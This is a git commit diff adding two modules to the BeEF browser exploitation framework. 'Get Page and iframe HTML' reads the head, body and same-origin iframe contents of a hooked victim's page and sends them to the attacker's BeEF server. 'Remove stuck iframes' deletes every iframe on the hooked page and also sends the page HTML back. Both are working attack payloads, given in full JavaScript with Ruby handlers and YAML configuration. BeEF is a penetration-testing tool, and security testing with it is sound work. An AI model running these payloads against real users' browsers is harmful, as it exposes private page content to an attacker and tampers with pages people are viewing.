Merge pull request #976 from kxynos/master

Remove stuck iframes and get html from page and iframes modules Thanks @kxynos
2014-03-11 09:08:02 +11:00
parent afdb7044d8 44058f0025
commit b3c4753114
6 changed files with 130 additions and 0 deletions
--- a/modules/browser/hooked_domain/get_page_html_iframe/command.js
+++ b/modules/browser/hooked_domain/get_page_html_iframe/command.js
@@ -0,0 +1,32 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	try {
+		var html_head = document.head.innerHTML.toString();
+	} catch (e) {
+		var html_head = "Error: document has no head";
+	}
+	try {
+		var html_body = document.body.innerHTML.toString();
+	} catch (e) {
+		var html_body = "Error: document has no body";
+	}
+        try {	
+		var iframes = document.getElementsByTagName('iframe');
+		for(var i=0; i<iframes.length; i++){
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, 'iframe'+i+'='+iframes[i].contentWindow.document.body.innerHTML);
+		}
+		var iframe_ = "Info: iframe(s) found";
+	} catch (e) {
+		var iframe_ = "Error: document has no iframe or policy issue";
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body+'&iframe_='+iframe_);
+
+});
+
--- a/modules/browser/hooked_domain/get_page_html_iframe/config.yaml
+++ b/modules/browser/hooked_domain/get_page_html_iframe/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        get_page_html_iframe:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Get Page and iframe HTML"
+            description: "This module will retrieve the HTML from the current page and any iframes (that have the same origin)."
+            authors: ["bcoles","kxynos"]
+            target:
+                working: ["ALL"]
--- a/modules/browser/hooked_domain/get_page_html_iframe/module.rb
+++ b/modules/browser/hooked_domain/get_page_html_iframe/module.rb
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_page_html_iframe < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['head'] = @datastore['head']
+    content['body'] = @datastore['body']
+    content['iframe_'] = @datastore['iframe_']
+    save content
+  end
+
+end
--- a/modules/browser/hooked_domain/remove_stuck_iframes/command.js
+++ b/modules/browser/hooked_domain/remove_stuck_iframes/command.js
@@ -0,0 +1,36 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	try {
+		var html_head = document.head.innerHTML.toString();
+	} catch (e) {
+		var html_head = "Error: document has no head";
+	}
+	try {
+		var html_body = document.body.innerHTML.toString();
+	} catch (e) {
+		var html_body = "Error: document has no body";
+	}
+        try {
+		var iframes = document.getElementsByTagName('iframe');
+		var iframe_count = iframes.length;
+		for(var i=0; i<iframe_count; i++){
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, 'iframe_result=iframe'+i+'_found');
+			//iframes[i].parentNode.removeChild(iframes[i]);
+			document.body.removeChild(iframes[0]);
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, 'iframe_result=iframe'+i+'_removed');
+		}
+		var iframe_ = "Info: "+ iframe_count +" iframe(s) processed";
+	} catch (e) {
+		var iframe_ = "Error: can not remove iframe";
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body+'&iframe_='+iframe_);
+
+});
+
--- a/modules/browser/hooked_domain/remove_stuck_iframes/config.yaml
+++ b/modules/browser/hooked_domain/remove_stuck_iframes/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        remove_stuck_iframes:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Remove stuck iframe"
+            description: "This module will remove any stuck iframes (beware it will remove all of them on that node!)."
+            authors: ["kxynos"]
+            target:
+                working: ["ALL"]
--- a/modules/browser/hooked_domain/remove_stuck_iframes/module.rb
+++ b/modules/browser/hooked_domain/remove_stuck_iframes/module.rb
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Remove_stuck_iframes < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['head'] = @datastore['head']
+    content['body'] = @datastore['body']
+    content['iframe_'] = @datastore['iframe_']
+    save content
+  end
+
+end